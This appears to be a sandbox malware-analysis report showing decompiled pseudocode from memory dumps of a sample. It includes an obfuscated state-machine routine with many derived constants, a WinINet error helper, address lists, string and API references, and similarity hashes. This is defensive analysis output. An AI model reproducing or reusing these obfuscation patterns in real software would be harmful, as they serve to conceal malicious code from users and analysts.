												_t833 = 0x7d61ae8;
												while(1) {
													L1:
													_t714 = 0xed1ef1f;
													goto L2;
												}
											} else {
												_t850 = _t833 - 0x70a5bfc;
												if(_t833 != 0x70a5bfc) {
													goto L27;
												} else {
													_t763 = _v2656;
													E04734A72(_t763, 1, _t850, _t763, 0, _v2652, _v2912,  &_v1044, 0, _v2804);
													_t839 =  &(_t839[7]);
													_t833 = 0x4417a50;
													while(1) {
														L1:
														_t714 = 0xed1ef1f;
														goto L2;
													}
												}
											}
										}
									}
								}
							}
							L16:
							__eflags = _t833 - 0xe33b76b;
							if(_t833 != 0xe33b76b) {
								__eflags = _t833 - _t714;
								if(__eflags == 0) {
									_push(0x4721730);
									_push(_v2632);
									_t733 = E04737AF5(_v2824, _v2684, __eflags);
									_pop(_t774);
									E04736056( &_v1044, _v2640,  &_v2604, _v2872, _v2780, _t774, _v2848, _v2880,  &_v1564, _v2756, _t733);
									_t763 = _v2916;
									E047263E1(_t763, _t733, _v2832, _v2740);
									_t839 =  &(_t839[0xc]);
									_t833 = 0x70a5bfc;
									while(1) {
										L1:
										_t714 = 0xed1ef1f;
										goto L2;
									}
								} else {
									__eflags = _t833 - 0xfbb91ac;
									if(_t833 == 0xfbb91ac) {
										return E047426DB(_v2616, _v2724, _v2820);
									}
									goto L27;
								}
								L20:
								return _t732;
							}
							_v2612 = E047280E1();
							_v2608 = 2 + E047278CC(_v2668, _v2648, _t728, _v2748, _v2772) * 2;
							_t763 = _t749;
							_t732 = E04736F95(_t763, _t749,  &_v2616, _v2776, _v2784, _v2660, _v2816, _t749, _v2644, _v2668, _v2800, _v2812, _v2900);
							_t839 =  &(_t839[0xe]);
							__eflags = _t732;
							if(__eflags != 0) {
								_t833 = 0xd16822;
								while(1) {
									L1:
									_t714 = 0xed1ef1f;
									goto L2;
								}
							}
							goto L20;
						}
						__eflags = _t833 - 0xc08886b;
						if(_t833 == 0xc08886b) {
							E0472F875( &_v2084, _v2768, _t763, _v2716);
							 *((short*)(E04724231(_v2868, _v2876,  &_v2084, _v2884, _v2892))) = 0;
							E0473584C( &_v524, _v2688, __eflags, _v2696, _v2704, _v2712);
							_push(0x4721610);
							_push(_v2680);
							E0473BAFF(__eflags,  &_v524, _v2744, _v2672, _v2852, E04737AF5(_v2760, _v2860, __eflags),  &_v2604, _v2752);
							E047263E1(_v2728, _t719, _v2844, _v2736);
							_t763 = _v2828;
							_t725 = E04731BB7(_v2664, _v2836, _t838,  &_v2604);
							_t839 =  &(_t839[0x16]);
							__eflags = _t725;
							if(__eflags == 0) {
								_t833 = 0xd4f659e;
								_t714 = 0xed1ef1f;
								goto L27;
							} else {
								_t833 = 0xe33b76b;
								goto L1;
							}
							goto L20;
						}
						goto L16;
						L27:
						__eflags = _t833 - 0xd4f659e;
					} while (__eflags != 0);
					return _t714;
				}
			}

0x0473bd6a
0x0473bd74
0x0473bd76
0x0473bd80
0x0473bd88
0x0473bd90
0x0473bd98
0x0473bda0
0x0473bdab
0x0473bdb6
0x0473bdc1
0x0473bdcc
0x0473bdd7
0x0473bddf
0x0473bdea
0x0473bdf5
0x0473bdfd
0x0473be08
0x0473be13
0x0473be1e
0x0473be29
0x0473be34
0x0473be3f
0x0473be4a
0x0473be55
0x0473be60
0x0473be6b
0x0473be76
0x0473be81
0x0473be8c
0x0473bea0
0x0473bea5
0x0473bea8
0x0473beaf
0x0473beba
0x0473bec5
0x0473becd
0x0473bed8
0x0473bee0
0x0473bee8
0x0473bef5
0x0473bef9
0x0473bf01
0x0473bf09
0x0473bf11
0x0473bf16
0x0473bf1e
0x0473bf26
0x0473bf2e
0x0473bf3b
0x0473bf3f
0x0473bf47
0x0473bf4f
0x0473bf57
0x0473bf5f
0x0473bf64
0x0473bf69
0x0473bf71
0x0473bf7c
0x0473bf87
0x0473bf92
0x0473bfa5
0x0473bfac
0x0473bfb7
0x0473bfc2
0x0473bfcd
0x0473bfd8
0x0473bfe3
0x0473bfee
0x0473bff9
0x0473c004
0x0473c00f
0x0473c018
0x0473c023
0x0473c02b
0x0473c033
0x0473c03b
0x0473c043
0x0473c04b
0x0473c056
0x0473c05e
0x0473c069
0x0473c074
0x0473c089
0x0473c08c
0x0473c093
0x0473c09e
0x0473c0a9
0x0473c0b4
0x0473c0bf
0x0473c0cc
0x0473c0d8
0x0473c0dc
0x0473c0e4
0x0473c0ec
0x0473c0f7
0x0473c102
0x0473c10a
0x0473c115
0x0473c120
0x0473c132
0x0473c137
0x0473c140
0x0473c14b
0x0473c157
0x0473c15c
0x0473c162
0x0473c16c
0x0473c16f
0x0473c173
0x0473c17b
0x0473c186
0x0473c191
0x0473c19c
0x0473c1a7
0x0473c1af
0x0473c1b9
0x0473c1bd
0x0473c1c2
0x0473c1ca
0x0473c1e0
0x0473c1e7
0x0473c1f2
0x0473c1fa
0x0473c206
0x0473c209
0x0473c20d
0x0473c212
0x0473c21a
0x0473c227
0x0473c232
0x0473c23d
0x0473c24b
0x0473c250
0x0473c256
0x0473c25e
0x0473c263
0x0473c26b
0x0473c276
0x0473c281
0x0473c28c
0x0473c297
0x0473c2a2
0x0473c2ad
0x0473c2b8
0x0473c2c3
0x0473c2ce
0x0473c2d9
0x0473c2e4
0x0473c2ef
0x0473c2fa
0x0473c305
0x0473c317
0x0473c31c
0x0473c325
0x0473c32d
0x0473c338
0x0473c343
0x0473c34b
0x0473c356
0x0473c361
0x0473c369
0x0473c371
0x0473c379
0x0473c381
0x0473c38c
0x0473c397
0x0473c3a2
0x0473c3ad
0x0473c3b8
0x0473c3c3
0x0473c3ce
0x0473c3db
0x0473c3de
0x0473c3e2
0x0473c3e7
0x0473c3ef
0x0473c3f7
0x0473c3ff
0x0473c404
0x0473c40c
0x0473c414
0x0473c41c
0x0473c427
0x0473c42b
0x0473c430
0x0473c438
0x0473c443
0x0473c44b
0x0473c456
0x0473c461
0x0473c470
0x0473c478
0x0473c47d
0x0473c483
0x0473c48b
0x0473c493
0x0473c49b
0x0473c4a0
0x0473c4a5
0x0473c4aa
0x0473c4b2
0x0473c4ba
0x0473c4bf
0x0473c4c7
0x0473c4cf
0x0473c4d7
0x0473c4e2
0x0473c4ea
0x0473c4f5
0x0473c500
0x0473c50b
0x0473c516
0x0473c521
0x0473c52c
0x0473c537
0x0473c53f
0x0473c547
0x0473c54f
0x0473c557
0x0473c55f
0x0473c56a
0x0473c575
0x0473c580
0x0473c58b
0x0473c593
0x0473c59b
0x0473c5a0
0x0473c5a8
0x0473c5b0
0x0473c5b8
0x0473c5bd
0x0473c5c5
0x0473c5cd
0x0473c5d5
0x0473c5e0
0x0473c5e7
0x0473c5ec
0x0473c5f5
0x0473c600
0x0473c60b
0x0473c613
0x0473c61b
0x0473c623
0x0473c628
0x0473c630
0x0473c638
0x0473c640
0x0473c64d
0x0473c64e
0x0473c652
0x0473c65a
0x0473c665
0x0473c66d
0x0473c678
0x0473c683
0x0473c68e
0x0473c699
0x0473c6a4
0x0473c6b8
0x0473c6bf
0x0473c6ca
0x0473c6d2
0x0473c6df
0x0473c6e5
0x0473c6ed
0x0473c6f5
0x0473c700
0x0473c708
0x0473c713
0x0473c71e
0x0473c729
0x0473c731
0x0473c73c
0x0473c750
0x0473c755
0x0473c75c
0x0473c764
0x0473c76f
0x0473c77e
0x0473c77f
0x0473c783
0x0473c78b
0x0473c793
0x0473c79b
0x0473c7a3
0x0473c7b0
0x0473c7b4
0x0473c7bc
0x0473c7d0
0x0473c7d7
0x0473c7e2
0x0473c7ed
0x0473c7f8
0x0473c803
0x0473c80e
0x0473c816
0x0473c821
0x0473c829
0x0473c831
0x0473c839
0x0473c841
0x0473c849
0x0473c85c
0x0473c863
0x0473c86e
0x0473c876
0x0473c87e
0x0473c883
0x0473c888
0x0473c897
0x0473c89c
0x0473c8a3
0x0473c8a5
0x0473c8a5
0x0473c8a5
0x0473c8aa
0x0473c8aa
0x0473c8aa
0x0473c8aa
0x0473c8b0
0x00000000
0x00000000
0x0473c8b6
0x0473ca14
0x0473ca1b
0x0473ca20
0x0473ca23
0x0473c8a5
0x0473c8a5
0x0473c8a5
0x00000000
0x0473c8a5
0x0473c8bc
0x0473c8c2
0x0473c9df
0x0473c9e7
0x0473c9ef
0x0473c9f0
0x0473c8a5
0x0473c8a5
0x0473c8a5
0x00000000
0x0473c8a5
0x0473c8c8
0x0473c8ce
0x0473c988
0x0473c989
0x0473c9ac
0x0473c9b3
0x0473c9b8
0x0473c9bb
0x0473c8a5
0x0473c8a5
0x0473c8a5
0x00000000
0x0473c8a5
0x0473c8d4
0x0473c8da
0x0473c970
0x0473c977
0x0473c979
0x0473c97f
0x0473c980
0x00000000
0x0473c8dc
0x0473c8e2
0x0473c92f
0x0473c943
0x0473c948
0x0473c94b
0x0473c8a5
0x0473c8a5
0x0473c8a5
0x00000000
0x0473c8a5
0x0473c8e4
0x0473c8e4
0x0473c8ea
0x00000000
0x0473c8f0
0x0473c912
0x0473c919
0x0473c91e
0x0473c921
0x0473c8a5
0x0473c8a5
0x0473c8a5
0x00000000
0x0473c8a5
0x0473c8a5
0x0473c8ea
0x0473c8e2
0x0473c8da
0x0473c8ce
0x0473c8c2
0x0473ca39
0x0473ca39
0x0473ca3f
0x0473ca45
0x0473ca47
0x0473ca78
0x0473ca7d
0x0473ca8f
0x0473ca95
0x0473cad4
0x0473cae9
0x0473caed
0x0473caf2
0x0473caf5
0x0473c8a5
0x0473c8a5
0x0473c8a5
0x00000000
0x0473c8a5
0x0473ca49
0x0473ca49
0x0473ca4f
0x00000000
0x0473ca6c
0x00000000
0x0473ca4f
0x0473ca77
0x0473ca77
0x0473ca77
0x0473cb16
0x0473cb48
0x0473cb6c
0x0473cb8c
0x0473cb91
0x0473cb94
0x0473cb96
0x0473cb9c
0x0473c8a5
0x0473c8a5
0x0473c8a5
0x00000000
0x0473c8a5
0x0473c8a5
0x00000000
0x0473cb96
0x0473ca2d
0x0473ca33
0x0473cbbc
0x0473cbe3
0x0473cc09
0x0473cc11
0x0473cc16
0x0473cc60
0x0473cc7c
0x0473cc95
0x0473cc99
0x0473cc9e
0x0473cca1
0x0473cca3
0x0473ccaf
0x0473ccb4
0x00000000
0x0473cca5
0x0473cca5
0x00000000
0x0473cca5
0x00000000
0x0473cca3
0x00000000
0x0473ccb9
0x0473ccb9
0x0473ccb9
0x00000000
0x0473c8aa

Strings

xL, xrefs: 0473C54F
gb5, xrefs: 0473C263
A&e, xrefs: 0473C537
]1X, xrefs: 0473C0B4
CXz, xrefs: 0473BDC1
<rn*, xrefs: 0473C652
7W}, xrefs: 0473C7E2
`q, xrefs: 0473C069
?*w, xrefs: 0473C4B2
cO, xrefs: 0473C66D
>, xrefs: 0473C783
a>, xrefs: 0473C56A
>#, xrefs: 0473C2B8
W*^o, xrefs: 0473C6E5
b, xrefs: 0473BFC2
X, xrefs: 0473C023
C8K, xrefs: 0473BFD8
ew., xrefs: 0473C5E0

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: 7W}$<rn*$>#$?*w$A&e$C8K$CXz$W*^o$X$]1X$`q$a>$b$cO$ew.$gb5$xL$>
API String ID: 0-2061082232
Opcode ID: 3a6baf082856aab506c975947ac84628edf620b55ab9577dc321ed93d210beb5
Instruction ID: e4810765dc4006abc23947abb3926a86d4f3d6ae87a8d96272b7aa67fba3f769
Opcode Fuzzy Hash: 3a6baf082856aab506c975947ac84628edf620b55ab9577dc321ed93d210beb5
Instruction Fuzzy Hash: EA72FF725083818FD3B9CF61C54AB9BBBE1BBC4308F10891DE6DA96260D7B59948CF53

Uniqueness

Uniqueness Score: -1.00%

Function 10005E84, Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 111
windownetworkmemoryCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E10005E84(void* __ecx, char* _a4, intOrPtr _a8, long _a12) {
				char _v8;
				long _v12;
				struct HINSTANCE__* _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int* _t26;
				void* _t27;
				void* _t36;
				long _t37;
				intOrPtr _t43;
				void* _t50;
				void* _t56;
				void* _t59;
				void* _t60;
				void* _t61;
				signed int _t70;

				_t53 = __ecx;
				_t26 = _a12;
				_push(_t60);
				_push(_t56);
				_t50 = __ecx;
				if(_t26 != 0) {
					 *_t26 =  *_t26 & 0x00000000;
					_t70 =  *_t26;
				}
				_push("WININET.DLL");
				_t27 = E10005B1B(_t50, _t53, _t56, _t60, _t70);
				_t61 = FormatMessageA;
				_v16 = _t27;
				if(_t27 == 0) {
					L4:
					_t55 =  &_v8;
					_t61 = FormatMessageA(0x1100, 0,  *(_t50 + 8), 0x800,  &_v8, 0, 0);
					if(_t61 != 0) {
						goto L6;
					} else {
						 *_a4 = 0;
						goto L17;
					}
				} else {
					_t55 =  &_v8;
					if(FormatMessageA(0x900, _t27,  *(_t50 + 8), 0x800,  &_v8, 0, 0) != 0) {
						L6:
						__eflags =  *(_t50 + 8) - 0x2ee3;
						if( *(_t50 + 8) != 0x2ee3) {
							E10005778(LocalFree, _t55, 0x800, _t61, _a4, _a8, _v8, 0xffffffff);
						} else {
							_a12 = _a12 & 0x00000000;
							_t36 = InternetGetLastResponseInfoA( &_v12, 0,  &_a12);
							__eflags = _t36;
							if(_t36 == 0) {
								_t37 = GetLastError();
								__eflags = _t37 - 0x7a;
								if(_t37 == 0x7a) {
									_t59 = LocalAlloc(0x40, _a12);
									__eflags = _t59;
									if(_t59 == 0) {
										 *_a4 = 0;
									} else {
										InternetGetLastResponseInfoA( &_v12, _t59,  &_a12);
										_t43 = _a8;
										__eflags = _t43 - _a12;
										if(_t43 < _a12) {
											 *_a4 = 0;
										} else {
											E10005778(LocalFree, _t55, _t59, InternetGetLastResponseInfoA, _a4, _t43, _t59, 0xffffffff);
										}
										LocalFree(_t59);
									}
								}
							}
						}
						_t61 = 1;
						__eflags = 1;
						LocalFree(_v8);
						L17:
						FreeLibrary(_v16);
						return _t61;
					}
					goto L4;
				}
			}

0x10005e84
0x10005e89
0x10005e90
0x10005e91
0x10005e92
0x10005e96
0x10005e98
0x10005e98
0x10005e98
0x10005e9b
0x10005ea0
0x10005ea5
0x10005eac
0x10005eb6
0x10005ed0
0x10005ed4
0x10005ee4
0x10005ee8
0x00000000
0x10005eea
0x10005eed
0x00000000
0x10005eed
0x10005eb8
0x10005ebc
0x10005ece
0x10005ef5
0x10005ef5
0x10005f02
0x10005f7c
0x10005f04
0x10005f0a
0x10005f18
0x10005f1a
0x10005f1c
0x10005f1e
0x10005f24
0x10005f27
0x10005f34
0x10005f36
0x10005f38
0x10005f6c
0x10005f3a
0x10005f43
0x10005f45
0x10005f48
0x10005f4b
0x10005f61
0x10005f4d
0x10005f54
0x10005f59
0x10005f65
0x10005f65
0x10005f38
0x10005f27
0x10005f1c
0x10005f89
0x10005f89
0x10005f8a
0x10005f8c
0x10005f8f
0x10005f9b
0x10005f9b
0x00000000
0x10005ece

APIs

FormatMessageA.KERNEL32(00000900,00000000,?,00000800,?,00000000,00000000), ref: 10005ECA
FormatMessageA.KERNEL32(00001100,00000000,?,00000800,?,00000000,00000000), ref: 10005EE2
InternetGetLastResponseInfoA.WININET(00002EE3,00000000,00000000), ref: 10005F18
GetLastError.KERNEL32 ref: 10005F1E
LocalAlloc.KERNEL32(00000040,00000000), ref: 10005F2E
InternetGetLastResponseInfoA.WININET(00002EE3,00000000,00000000), ref: 10005F43
LocalFree.KERNEL32(00000000), ref: 10005F65

Part of subcall function 10005778: __cftof.LIBCMT ref: 10005789

LocalFree.KERNEL32(?), ref: 10005F8A
FreeLibrary.KERNEL32(?), ref: 10005F8F

Strings

WININET.DLL, xrefs: 10005E9B
., xrefs: 10005EF5

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeLastLocal$FormatInfoInternetMessageResponse$AllocErrorLibrary__cftof
String ID: WININET.DLL$.
API String ID: 908267364-4264371604
Opcode ID: 9ba3f1b6e3c6bdcf324bedade1a0dd651d265ac88d6dad140017924626f33b0f
Instruction ID: 15ab7e9ed1e4152e6647d543301f60638c60f954ac8569d6da522c99912ba750
Opcode Fuzzy Hash: 9ba3f1b6e3c6bdcf324bedade1a0dd651d265ac88d6dad140017924626f33b0f
Instruction Fuzzy Hash: 32318C3290425AAFEB01DF98CC84FAF7BA8EB05391F210161FD049A194DB75DE10CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 04742A78, Relevance: 15.6, Strings: 12, Instructions: 584
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E04742A78(intOrPtr __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				char _v4;
				char _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				intOrPtr _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				void* _t610;
				void* _t665;
				void* _t673;
				void* _t678;
				void* _t682;
				void* _t686;
				void* _t692;
				void* _t694;
				intOrPtr _t702;
				void* _t757;
				void* _t774;
				signed int _t776;
				signed int _t777;
				signed int _t778;
				signed int _t779;
				signed int _t780;
				signed int _t781;
				signed int _t782;
				signed int _t783;
				signed int _t784;
				signed int _t785;
				signed int _t786;
				signed int _t787;
				signed int _t788;
				signed int _t789;
				signed int _t790;
				signed int _t791;
				signed int _t792;
				void* _t793;
				void* _t796;
				void* _t797;
				void* _t798;
				void* _t801;

				_push(_a20);
				_v168 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0x20);
				_push(__ecx);
				E0472DD01(_t610);
				_v76 = 0xa65e41;
				_t798 = _t797 + 0x1c;
				_t796 = 0;
				_t694 = 0x9c13901;
				_t776 = 0x4c;
				_v76 = _v76 / _t776;
				_v76 = _v76 ^ 0x00023065;
				_v136 = 0xfbf33f;
				_t777 = 0x53;
				_v136 = _v136 * 0x46;
				_v136 = _v136 * 0x65;
				_v136 = _v136 ^ 0x2e27c5e2;
				_v216 = 0xd4f069;
				_v216 = _v216 | 0xfee9def7;
				_v216 = _v216 >> 3;
				_v216 = _v216 ^ 0x1fdfbfdf;
				_v48 = 0x35051b;
				_v48 = _v48 ^ 0x1fc73af1;
				_v48 = _v48 ^ 0x1ff23fea;
				_v132 = 0x3722ef;
				_v132 = _v132 * 0x23;
				_v132 = _v132 / _t777;
				_v132 = _v132 ^ 0x00174014;
				_v148 = 0xaa9e5;
				_v148 = _v148 + 0xffffaf41;
				_v148 = _v148 | 0x3e592d36;
				_v148 = _v148 ^ 0x3e5b7d36;
				_v272 = 0x67ed3f;
				_v272 = _v272 << 0x10;
				_t778 = 0x69;
				_v272 = _v272 / _t778;
				_v272 = _v272 + 0x2371;
				_v272 = _v272 ^ 0x02429127;
				_v240 = 0xcf462c;
				_v240 = _v240 >> 4;
				_v240 = _v240 + 0xd30e;
				_v240 = _v240 * 0x3a;
				_v240 = _v240 ^ 0x031f2f60;
				_v232 = 0x90c3b9;
				_v232 = _v232 | 0x7efd5f9e;
				_v232 = _v232 + 0x992b;
				_v232 = _v232 ^ 0x7efe78ea;
				_v180 = 0xc87ea6;
				_v180 = _v180 | 0x7b0a95d4;
				_v180 = _v180 << 3;
				_v180 = _v180 | 0x252cf21a;
				_v180 = _v180 ^ 0xff7fffba;
				_v84 = 0xd0ee7e;
				_v84 = _v84 ^ 0x8027b7fe;
				_v84 = _v84 ^ 0x80f75980;
				_v184 = 0xa9fa0b;
				_v184 = _v184 | 0xae6d814b;
				_t779 = 5;
				_v184 = _v184 / _t779;
				_t780 = 0x61;
				_v184 = _v184 / _t780;
				_v184 = _v184 ^ 0x005c557f;
				_v96 = 0x371b61;
				_v96 = _v96 << 2;
				_v96 = _v96 ^ 0x00d26250;
				_v152 = 0x510e6a;
				_v152 = _v152 | 0x88cf3658;
				_v152 = _v152 + 0xffff7873;
				_v152 = _v152 ^ 0x88dddd8f;
				_v212 = 0xc23069;
				_v212 = _v212 + 0xd09b;
				_v212 = _v212 >> 8;
				_t781 = 0x28;
				_v212 = _v212 * 0x3d;
				_v212 = _v212 ^ 0x002fc7ae;
				_v112 = 0xb94c38;
				_v112 = _v112 + 0xa0a0;
				_v112 = _v112 << 9;
				_v112 = _v112 ^ 0x73d6c23b;
				_v188 = 0xaf906c;
				_v188 = _v188 ^ 0x88457ccd;
				_v188 = _v188 / _t781;
				_t782 = 0x7d;
				_v188 = _v188 / _t782;
				_v188 = _v188 ^ 0x00044955;
				_v252 = 0x65638;
				_v252 = _v252 + 0xffff663e;
				_v252 = _v252 >> 7;
				_t783 = 0x76;
				_v252 = _v252 / _t783;
				_v252 = _v252 ^ 0x000188d8;
				_v204 = 0x1436bd;
				_t784 = 0x6f;
				_v204 = _v204 * 0x57;
				_v204 = _v204 + 0xffff3f8e;
				_v204 = _v204 | 0x32ab6461;
				_v204 = _v204 ^ 0x36f371a1;
				_v164 = 0x2dbe2e;
				_v164 = _v164 << 7;
				_v164 = _v164 + 0xffff5fa1;
				_v164 = _v164 ^ 0x16df5bc4;
				_v144 = 0xa84fd1;
				_v144 = _v144 ^ 0xa29ba05e;
				_v144 = _v144 / _t784;
				_v144 = _v144 ^ 0x017bb85d;
				_v244 = 0xb1905c;
				_v244 = _v244 + 0xffff8232;
				_v244 = _v244 * 0x37;
				_t785 = 0x1a;
				_v244 = _v244 / _t785;
				_v244 = _v244 ^ 0x0170584b;
				_v236 = 0xf22824;
				_v236 = _v236 | 0xe25e7562;
				_v236 = _v236 + 0x7259;
				_t786 = 0x23;
				_v236 = _v236 * 0x59;
				_v236 = _v236 ^ 0xeaa0e89f;
				_v160 = 0xbcddcc;
				_v160 = _v160 + 0xf51a;
				_v160 = _v160 >> 3;
				_v160 = _v160 ^ 0x001ba011;
				_v104 = 0xfc88e6;
				_v104 = _v104 | 0x1e381927;
				_v104 = _v104 ^ 0x787be5b5;
				_v104 = _v104 ^ 0x66878bbf;
				_v156 = 0xd4fc63;
				_v156 = _v156 + 0xf1d3;
				_v156 = _v156 * 0x29;
				_v156 = _v156 ^ 0x2247496f;
				_v32 = 0x98aa55;
				_v32 = _v32 + 0x969a;
				_v32 = _v32 ^ 0x009979a7;
				_v172 = 0x904577;
				_v172 = _v172 * 0x67;
				_v172 = _v172 + 0xffffe979;
				_v172 = _v172 >> 8;
				_v172 = _v172 ^ 0x003b0eba;
				_v88 = 0xfb00cb;
				_v88 = _v88 ^ 0x8f373c1e;
				_v88 = _v88 ^ 0x8fcc6755;
				_v92 = 0xbfa73c;
				_v92 = _v92 ^ 0xc2766cac;
				_v92 = _v92 ^ 0xc2c42c6b;
				_v224 = 0x5a12ad;
				_v224 = _v224 | 0xa1a9acd6;
				_v224 = _v224 ^ 0xafaf4933;
				_v224 = _v224 | 0xe0d64bf9;
				_v224 = _v224 ^ 0xeed0e3b2;
				_v56 = 0x9ec2dc;
				_v56 = _v56 ^ 0x44ae0f01;
				_v56 = _v56 ^ 0x4439ad07;
				_v64 = 0x9883d0;
				_v64 = _v64 + 0xffff491c;
				_v64 = _v64 ^ 0x009a4197;
				_v208 = 0x3ba933;
				_v208 = _v208 ^ 0xe327a09a;
				_v208 = _v208 * 0x79;
				_v208 = _v208 | 0x5a8513fd;
				_v208 = _v208 ^ 0x5ac02cee;
				_v72 = 0xbbbd27;
				_v72 = _v72 | 0x1db6e3eb;
				_v72 = _v72 ^ 0x1db92f13;
				_v80 = 0x2c4109;
				_v80 = _v80 + 0xc65e;
				_v80 = _v80 ^ 0x002add16;
				_v192 = 0xa1737a;
				_v192 = _v192 << 0xe;
				_v192 = _v192 + 0xffff9e9b;
				_v192 = _v192 >> 2;
				_v192 = _v192 ^ 0x1732f207;
				_v200 = 0xd91ae8;
				_v200 = _v200 | 0x69906182;
				_v200 = _v200 + 0xf779;
				_v200 = _v200 | 0xec838613;
				_v200 = _v200 ^ 0xedd0c627;
				_v116 = 0xad856e;
				_v116 = _v116 / _t786;
				_t787 = 0x34;
				_v116 = _v116 / _t787;
				_v116 = _v116 ^ 0x00077aea;
				_v44 = 0xa000af;
				_t788 = 0x59;
				_v44 = _v44 * 0x2e;
				_v44 = _v44 ^ 0x1cc8e43e;
				_v220 = 0x98b960;
				_v220 = _v220 * 0x74;
				_v220 = _v220 | 0xf49cc035;
				_v220 = _v220 / _t788;
				_v220 = _v220 ^ 0x02c64091;
				_v52 = 0x15a838;
				_v52 = _v52 ^ 0x92c46a61;
				_v52 = _v52 ^ 0x92d02f3f;
				_v24 = 0x81e3f1;
				_v24 = _v24 + 0xffff7656;
				_v24 = _v24 ^ 0x0085fc23;
				_v60 = 0x2ab08b;
				_v60 = _v60 + 0xffff9da8;
				_v60 = _v60 ^ 0x002bb96f;
				_v140 = 0xbe4105;
				_v140 = _v140 >> 0xf;
				_v140 = _v140 | 0xc585e529;
				_v140 = _v140 ^ 0xc58882f3;
				_v36 = 0x14c1d7;
				_v36 = _v36 | 0x9887e73d;
				_v36 = _v36 ^ 0x9899d506;
				_v248 = 0xeabdce;
				_v248 = _v248 >> 0xf;
				_v248 = _v248 + 0xaf7b;
				_v248 = _v248 + 0xcd97;
				_v248 = _v248 ^ 0x00059e60;
				_v256 = 0xedcbfa;
				_v256 = _v256 >> 5;
				_t789 = 0x26;
				_v256 = _v256 / _t789;
				_t790 = 0x38;
				_v256 = _v256 / _t790;
				_v256 = _v256 ^ 0x000de6bb;
				_v124 = 0x5430b3;
				_v124 = _v124 + 0x3a4c;
				_v124 = _v124 >> 8;
				_v124 = _v124 ^ 0x0006c82d;
				_v264 = 0x181efc;
				_v264 = _v264 + 0x49f9;
				_t791 = 0x49;
				_v264 = _v264 / _t791;
				_v264 = _v264 >> 9;
				_v264 = _v264 ^ 0x000ba30e;
				_v120 = 0xdcc31f;
				_v120 = _v120 >> 5;
				_v120 = _v120 >> 2;
				_v120 = _v120 ^ 0x0006e9ed;
				_v268 = 0x7d7f89;
				_t792 = 0x57;
				_v268 = _v268 / _t792;
				_v268 = _v268 << 5;
				_v268 = _v268 + 0x7bd9;
				_t774 = 0x3a4ed12;
				_v268 = _v268 ^ 0x002e1546;
				_t793 = 0xe7dfced;
				_v28 = 0x583cb4;
				_v28 = _v28 ^ 0xb59216ad;
				_v28 = _v28 ^ 0xb5cbd82e;
				_v260 = 0xa1cf10;
				_v260 = _v260 << 9;
				_v260 = _v260 + 0xffffe889;
				_v260 = _v260 << 0xd;
				_v260 = _v260 ^ 0xc11ddc2e;
				_v128 = 0x8dd164;
				_v128 = _v128 >> 0xc;
				_v128 = _v128 >> 8;
				_v128 = _v128 ^ 0x00063719;
				_v276 = 0xa49386;
				_v276 = _v276 * 0x35;
				_v276 = _v276 | 0xdbf6fffd;
				_v276 = _v276 ^ 0xfbf0eaf0;
				_v196 = 0x318553;
				_v196 = _v196 * 0x36;
				_v196 = _v196 ^ 0x496fbb7e;
				_v196 = _v196 + 0x4132;
				_v196 = _v196 ^ 0x4315d411;
				_v228 = 0x4d7681;
				_v228 = _v228 >> 0xc;
				_v228 = _v228 >> 6;
				_v228 = _v228 >> 0xa;
				_v228 = _v228 ^ 0x000abb21;
				_v68 = 0xd42ad;
				_v68 = _v68 * 0x11;
				_v68 = _v68 ^ 0x00ef84c9;
				_v100 = 0x12c562;
				_v100 = _v100 | 0x72f453e9;
				_v100 = _v100 + 0xffffc15c;
				_v100 = _v100 ^ 0x72f447c1;
				_v176 = 0x98a51a;
				_v176 = _v176 >> 7;
				_v176 = _v176 + 0x7082;
				_v176 = _v176 ^ 0x4e57c17f;
				_v176 = _v176 ^ 0x4e5a1a0f;
				_v108 = 0x7ff501;
				_v108 = _v108 * 0x1f;
				_v108 = _v108 >> 0xf;
				_v108 = _v108 ^ 0x0007ec45;
				_v40 = 0x82ae12;
				_v40 = _v40 >> 1;
